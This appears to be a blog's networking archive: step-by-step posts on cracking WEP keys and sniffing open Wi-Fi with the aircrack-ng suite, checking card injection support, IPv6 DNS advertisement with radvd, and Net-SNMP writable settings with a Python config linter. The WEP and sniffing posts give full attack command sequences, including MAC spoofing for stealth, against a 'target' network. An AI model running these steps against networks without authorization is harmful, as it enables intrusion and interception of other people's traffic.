Category Archives: Networking

Breaking WEP Encryption

Using Debian Wheezy (testing) with an Intel Corporation Centrino Wireless-N 1000 card…

    1. Stop network manager: /etc/init.d/network-manager stop
    2. Enter monitor mode: airmon-ng start wlan0
    3. Find nearby networks: airodump-ng mon0
    4. Identify the target BSSID, SSID and Channel number (-c option below)
    5. Start packet capture and leave running: airodump-ng -c 6 --bssid 00:11:22:33:44:55 -w capturefile mon0
    6. Run the following two commands at the same time in separate windows (-h changes our source address, to add some stealth)
      1. aireplay-ng --fakeauth 40 -a 00:11:22:33:44:55 -h 01:12:34:56:67:89 --ignore-negative-one mon0
      2. aireplay-ng --arpreplay -x 20 -b 00:11:22:33:44:55 -h 01:12:34:56:67:89 --ignore-negative-one -e SSID mon0
      When this sees an ARP packet, it will go like crazy injecting packets, and you will see the "#Data" count rapidly increasing in the airodump-ng window.
    7. After collecting 30,000 packets (you may leave airodump-ng running): aircrack-ng -1 capturefile.cap
    8. The WEP key should then be displayed in the terminal window.
    9. The collected packet trace may be decrypted with: airdecap-ng -w $wep_key_hex capturefile.cap
    10. Exit monitor mode: airmon-ng stop mon0

Open Wireless Network Packet Sniffing

This is easier and more effective than packet sniffing on a wired network:

  1. Stop Network Manager: /etc/init.d/network-manager stop
  2. Set your WiFi card into monitoring mode: airmon-ng start wlan0
  3. See what’s around: airodump-ng mon0
  4. Select a target network, and note the BSSID value and channel (used as the ‘-c’ option below)
  5. Collect the packet trace: airodump-ng -c 6 --bssid 00:12:34:56:78:90 -w output-file mon0
  6. Examine packet trace: wireshark output-file.cap

(run on Debian Wheezy [testing] using Intel Corporation Centrino Wireless-N 1000)

WiFi Card – Packet Injection in Linux

Very simple way to test if your WiFi card supports injection:

Stop Network Manager: /etc/init.d/network-manager stop
Put the card in monitor mode: airmon-ng start wlan0
Test using: aireplay-ng -9 mon0

With luck, the following output is displayed:
Trying broadcast probe requests…
Injection is working!

I am using Debian Wheezy (testing) with WiFi card:
Network controller: Intel Corporation Centrino Wireless-N 1000

IPv6 DNS Advertisements

DNS client configuration can be handled by the standard Router Advertisement Daemon (radvd) – apt-get install radvd

Edit /etc/radvd.conf on your Linux Router and insert the following at the end of the file to use Google’s DNS Caching server:

# RDNSS is an interface-level option: keep it inside the interface { ... } block
RDNSS 2001:4860:4860::8888
{
};

On your Linux clients, install rdnssd to automatically add the advertised IPv6 DNS servers to your /etc/resolv.conf.

The /etc/resolv.conf now contains both IPv4 and IPv6 entries. Typically a DHCP client adds the IPv4 DNS server entries; this can be prevented by removing ‘domain-name-servers’ from the ‘request’ line in dhclient.conf.

Net-SNMP writable attribute

Solarwinds NMS verifies the SNMP write configuration of its nodes (agents) by attempting to set the ‘sysContact.0’ (1.3.6.1.2.1.1.4.0) value.

On Net-SNMP you must first configure the ‘rwcommunity’ setting in the snmpd.conf file. Do not set the ‘sysContact’ value in snmpd.conf.

Configuring ‘sysContact’ (or any other ‘sys’ setting) in the configuration file results in that value being set as read-only. You will not be able to remotely configure the value, and Solarwinds configuration tests will fail.

Instead, set values like ‘sysContact’, ‘sysName’, ‘sysDescr’, etc. using the command snmpset included with net-snmp.
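
A quick way to check an snmpd.conf for the two conditions above before pointing the NMS at it. This is an added example, not part of the original post or of Net-SNMP. It assumes SNMP v1/v2c community configuration only; the function name, the sample file and the community strings are constructed for illustration.

```python
# Added example: lint snmpd.conf text for the conditions described above.
# Directives that, once set in the file, make the object read-only.
PINNED = {"syscontact": "sysContact.0", "sysname": "sysName.0",
          "syslocation": "sysLocation.0"}
RW_TOKENS = {"rwcommunity", "rwcommunity6"}

# Constructed sample, not taken from a real host.
SAMPLE = """\
# snmpd.conf
rocommunity  EXAMPLE-RO  192.0.2.0/24
rwcommunity  EXAMPLE-RW
sysContact   noc@example.org
syslocation  rack 12
"""


def lint_snmpd_conf(text):
    """Return (read_only_objects, rw_sources, findings) for snmpd.conf text."""
    read_only, rw_sources, findings = [], [], []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):   # blank line or whole-line comment
            continue
        fields = line.split()
        token = fields[0].lower()              # compare directive names case-insensitively
        if token in PINNED:
            read_only.append(PINNED[token])
            findings.append(f"line {lineno}: {fields[0]} set in file, so "
                            f"{PINNED[token]} is read-only and a remote SET fails")
        elif token in RW_TOKENS:
            # rwcommunity COMMUNITY [SOURCE [OID]]; the community itself is never echoed
            source = fields[2] if len(fields) > 2 else "default"
            rw_sources.append(source)
            if source.lower() == "default":
                findings.append(f"line {lineno}: {fields[0]} accepts any source; "
                                "restrict it to the NMS address")
    if not rw_sources:
        findings.append("no rwcommunity line found")
    return read_only, rw_sources, findings


if __name__ == "__main__":
    for finding in lint_snmpd_conf(SAMPLE)[2]:
        print(finding)
```

On the sample it flags the unrestricted rwcommunity line and the two pinned values; a file with only `rwcommunity COMMUNITY NMS-ADDRESS` produces no findings.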